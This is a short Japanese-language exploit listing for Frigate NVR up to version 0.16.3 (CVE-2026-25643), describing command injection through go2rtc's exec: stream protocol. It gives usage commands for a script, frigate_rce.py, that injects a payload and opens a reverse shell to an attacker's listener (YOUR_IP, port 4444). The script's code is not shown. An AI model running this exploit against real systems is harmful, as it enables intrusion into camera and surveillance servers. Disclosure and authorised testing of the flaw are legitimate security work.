
go2rtc exec: プロトコルインジェクションを介したFrigate NVRの認証済みRCEのエクスプロイト。システムコマンド実行とリバースシェルキャプチャを自動化します。
エクスプロイトタイトル: Frigate NVR <= 0.16.3 - 認証済みリモートコード
実行
日付: 2026-02-05
エクスプロイト作者: jduardo2704
ベンダーホームページ: https://frigate.video/
ソフトウェアリンク: https://github.com/blakeblackshear/frigate
バージョン: <= 0.16.3
CVE: CVE-2026-25643
アドバイザリ: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
Frigate 0.16.3 までのバージョンは、go2rtc 設定を介したリモートコード実行(RCE)に対して脆弱です。認証済みアクセスを持つ攻撃者(インスタンスが公開されている場合は認証なし)は、exec: プロトコルを使用してストリーム設定にシステムコマンドを注入できます。このエクスプロイトはペイロードの注入を自動化し、サービスを再起動して、リバースシェルを取得します。
pip install requests pyyaml
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444
このスクリプトは教育目的および許可を得たセキュリティテスト専用です。